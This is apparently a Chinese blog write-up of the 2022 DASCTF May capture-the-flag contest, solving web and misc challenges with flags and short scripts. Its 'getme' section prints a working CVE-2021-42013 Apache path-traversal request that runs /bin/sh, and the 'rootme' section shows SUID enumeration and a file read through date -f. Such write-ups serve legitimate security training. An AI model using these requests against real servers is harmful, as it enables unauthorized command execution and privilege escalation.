2022DASCTF MAY 出题人挑战赛 Writeup

已于 2022-05-23 23:21:32 修改 589 收藏 1
分类专栏: CTF_WEB_Writeup 文章标签: DASCTF月赛
于 2022-05-23 19:11:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/124903862
版权

文章目录

WEB

Power Cookie

在这里插入图片描述
在这里插入图片描述
设置Cookie: admin=1;即可
在这里插入图片描述

魔法浏览器

在这里插入图片描述
把源码中的JS拿到Console运行,得到一个UA
在这里插入图片描述
在这里插入图片描述

getme

在这里插入图片描述
在这里插入图片描述
Apache/2.4.50,去年时间出的Apache 远程代码执行 (CVE-2021-42013)
在这里插入图片描述

GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: node4.buuoj.cn:28174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT
If-None-Match: "8d-5de58c91a8500"
Content-Length: 45

echo Content-Type: text/plain; echo;ls -lha /

在这里插入图片描述
在这里插入图片描述

MISC

不懂PCB的厨师不是好黑客

在这里插入图片描述
在这里插入图片描述

DASCTF{77e64b28-3e93-42ed-a576-b2e1ab718be6}

卡比

在这里插入图片描述
在这里插入图片描述
维吉尼亚
在这里插入图片描述

FLAG{IMVERYLIKEKIRBY}

噪音

在这里插入图片描述
和我以前出的一题有点像://www.1iene.com/article/details/122005160

对振幅的数值进行分析,可以用上面链接中的脚本分析,或者直接用010 Editor打开加载wav插件
在这里插入图片描述

import wave

obj = wave.open('attachment.wav', 'r')
frames = obj.getnframes()
print("All Frames: {}".format(frames))
frames_data = obj.readframes(50).hex()#提取出前50帧的数据
for i in range(0, len(frames_data), 4):
	data = frames_data[i:i+4]
	real_data = int(data[2:] + data[:2], 16)
	data1 = data[2:] + data[:2]
	print("第{:<2}帧: {} => {}  真实数据值: {}".format(int((i+4)/4), data,data1 , real_data))

在这里插入图片描述
在这里插入图片描述
简单分析下还是能发现每一帧的数值

约等于1000
约等于1500
约等于2000
约等于2500
约等于3000
约等于3500
约等于4000
约等于4500
约等于5000
约等于5500
约等于6000
约等于6500
约等于7000
约等于7500
约等于8000
约等于8500

按照区间可以分成十六部分,猜测十六进制

import wave
import binascii

obj = wave.open('attachment.wav', 'r')
frames = obj.getnframes()
print("All Frames: {}".format(frames))
frames_data = obj.readframes(frames).hex()
hexdata = ''
for i in range(0, len(frames_data), 4):
	data = frames_data[i:i+4]
	real_data = int(data[2:] + data[:2], 16)
	if real_data < 1000:
		hexdata += '0'
	elif real_data > 1000 and real_data < 1500:
		hexdata += '1'
	elif real_data > 1500 and real_data < 2000:
		hexdata += '2'
	elif real_data > 2000 and real_data < 2500:
		hexdata += '3'
	elif real_data > 2500 and real_data < 3000:
		hexdata += '4'
	elif real_data > 3000 and real_data < 3500:
		hexdata += '5'
	elif real_data > 3500 and real_data < 4000:
		hexdata += '6'
	elif real_data > 4000 and real_data < 4500:
		hexdata += '7'
	elif real_data > 4500 and real_data < 5000:
		hexdata += '8'
	elif real_data > 5000 and real_data < 5500:
		hexdata += '9'
	elif real_data > 5500 and real_data < 6000:
		hexdata += 'a'
	elif real_data > 6000 and real_data < 6500:
		hexdata += 'b'
	elif real_data > 6500 and real_data < 7000:
		hexdata += 'c'
	elif real_data > 7000 and real_data < 7500:
		hexdata += 'd'
	elif real_data > 7500 and real_data < 8000:
		hexdata += 'e'
	elif real_data > 8000 and real_data < 8500:
		hexdata += 'f'
	else:
		print(real_data)
		break

print(binascii.unhexlify(hexdata))

在这里插入图片描述

DASCTF{muisc_noise_can_hide_Flaaaag}

rootme

在这里插入图片描述
查找具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
date命令有个-f参数可以读文件
在这里插入图片描述
在这里插入图片描述

神必流量

在这里插入图片描述
在这里插入图片描述
选中右键...as a Hex Stream复制出来
在这里插入图片描述
37 7a bc af开始截取,转7z

from binascii import *

hexdata = '377abcaf271c00044aaed88750000000000000006a000000000000002d108d3939dc5abb57f2606b99b18fb7518aa378d2dcfed3f7a197d4e752b6156b026bf975d5fa5c37618bdfe2c567592e7128e139c1a6ac4e9eed598dd3398c03c16a35502e827004852aae6a7342214fa901c30104060001095000070b0100022406f107010a5307ef3e981518c6bd122121010001000c4a4600080a011a4cdb8a00000501190900000000000000000011130066006c00610067002e0074007800740000001900140a010066629f3bc46cd801150601002000000000000600313233343536'
with open('flag.7z', 'wb') as f:
	f.write(unhexlify(hexdata))

解压密码是附加的123456
在这里插入图片描述
得到google云盘下载链接

https://drive.google.com/file/d/140MxBVh-OGvQUuk8tmOw4Xm8it9utIzo/view

在这里插入图片描述
需要对main.exe进行逆向分析

具体请参考:http://www.snowywar.top/?p=3323

DASCTF{6f938f4c-f850-4f04-b489-009c2ed1c4fd}
末初mochu7
关注
  • 3
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2022DASCTF MAY 出题挑战赛个人Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
05-22 423
文章目录WEBPower Cookie魔法浏览器getmehackmefxxkgoMISC不懂PCB的厨师不是好黑客卡比神必流量 感觉这次难度还比较友好,一个人肝到第18,不过全是web和misc,密码再给点时间感觉也能出。 WEB Power Cookie 以游客身份登录,发现服务器返回了set-cookie 将set-cookie返回的值上送,并修改成管理员即可 Cookie: admin=1; Path=/; Domain=127.0.0.1; Max-Age=3600 魔法浏览器 查看源代码,
2022DASCTF MAY 出题挑战赛WP——web
最新发布
Tony_StarkX的博客
12-23 23
2022DASCTF MAY 出题挑战赛WP——Web
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 561
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF X GFCTF 2022十月挑战赛 WriteUp
Whitebird的博客
10-24 2835
DASCTF X GFCTF 2022十月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛 Writeup
末初 · mochu7
09-20 870
位置相近打错了,这三部分key应该是相同的。显然应该是用来迷惑的,真正的。ZIP压缩包且有三部分key,并且压缩方法为。的字节流逆序,且每个字节高低位反转了。得到键盘流量,尝试了直接使用。保存前端源码,对整个文件夹找。的生成机制,追踪一下哪里调用。的压缩格式,可修改后缀为。玩游戏的过程中发现有一个。,我们直接可以生成一个。,然后每隔若干个就有。Python简单处理。可以看到传入的参数是。
DASCTF X GFCTF 2022十月挑战赛
shinygod的博客
10-29 657
Dasctf 复现
DASCTF X GFCTF 2022十月挑战赛web
m0_62422842的博客
10-30 1087
此篇题解涉及到了pop链 的构造,phar上传以及rce,php原生类以及ssrf打内网redis,还有flask框架
Hackergame 2022 Writeup(来自一位啥都不会的萌新)
wohohohoho的博客
10-29 1097
第一次写writeup有不足之处请见谅(
SWCTF2022Writeup
Amherstieae的博客
04-28 732
写在前面:啊很久没有打一场完整的比赛并且复盘了,刚才得知有师傅读了我的博客学到一些新的东西啦,感觉写博客也是超有意义的一件事情,希望自己能继续坚持不懈的走下去,也算是对自己的一个勉励吧。 Game 图片在下面 下载文件附件名称为docx,那么一般文件就是一个文档,修改名称为1.docx即可看见里面正文,如下 对于docx文档有一个字体隐藏,或者是文字被改成了白色,如果有段落起止符的话可以根据这个来看,没有的话先大体看一下文字&隐藏文字 隐藏文字:选中所有文字,右击有个字体, 看这个样子就是没有了
DASCTF X CBCTF 2022九月挑战赛
qq_62046696的博客
10-24 826
总结:其实当时做的时候,也想到这些了比如第一道题,但是当时没有时间戳的概念,不知道在前端找check.php发包的,然后导致,没思路。说明其中有字符确认掉了,然后发现是{{我们可以用 {{% print % }}代替,now as a web service一个web服务,那么大概几率就是ssti了。抓了个包,100000000分肯定是改一些东西,发现了check.php。一般这种题目,要么是sql注入要么就是ssti模板注入。第二个ssti单纯是因为懒!这道题打开以后其实就是一个逆序的文本框,
DASCTF X GFCTF 2022十月挑战赛--Crypto
Luiino的博客
11-05 177
最后一步没搞出来,勉强就会这一道了(看了wp的情况下)。就是把flag截取成前一部分和后一部分。解出n_1,发现可以分解,有三个因数,那。对m进行随机数取余,在进行rsa基础加密。n2:取flag第20位字节之后的部分。传的参数是m2,即flag的后一部分。,解得k2 = 0,即m2 = m。n1:将flag右移200比特。看起来逻辑一样,基础rsa加密。得到了flag的前一部分。于是在模n_3的域上构造。
DASCTF X GFCTF 2022十月挑战赛-hade_waibo
qq_64201116的博客
10-26 589
这是一个非预期解,但是得到出题人的赞许,莫名开心,哈哈:cancan need处存在任意文件读取这种查文件+文件上传,多半就是考phar,但是这次没做出来主要卡在的过滤了本来的思路是上传一个文件1.jpg,内容如下:#!/bin/bashls /这个文件在/upload目录下面,只要命令是。
2022DASCTF MAY 出题挑战赛
qq_61620566的博客
05-27 329
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、misc 1.不懂PCB的厨师不是好黑客 2.卡比 二、web 1. 2. 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、misc 1.不懂PCB的厨师不是好黑客 用记事本.
DASCTF X GFCTF 2022十月 Misc
mumuzi的博客
10-24 2251
DASCTF X GFCTF 2022 10月
2022赣政杯CTF---Writeup
3tefanie丶zhou的博客
08-23 700
【喜欢一个女子时,岂敢不真心,岂敢不用心。】
DASCTF X GFCTF 2022十月挑战赛-web复现wp
m0_53567065的博客
11-02 677
1.找魔术方法(因为我初学记不住),出口函数和入口函数接下来写exp这里注意一下要绕过fine 类的 __wakeup,将属性个数改成大于实际个数就行。看了个师傅的wp,知道了感觉比较方便的写法,就是写__construct()构造函数。
DASCTF 2022十月挑战赛 web
qq_61768489的博客
11-04 513
拿到源码就看哪里可以命令执行RCE,看那些php特殊函数,这里的话 就是`call_user_func($this->cmd, $this->content);首先destruct就直接调用了这两个方法,newnewnew()里面的参数我们是可控的属性,flag()里调用了不存在的方法。这里为何还需要User对象用一个不存在的属性实例化 Test()类,确实不太理解,有和没有的区别如下。admin被注册了,考虑如何登录admin,用普通用户登录一下,有发布文章,修改密码,查看文章的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值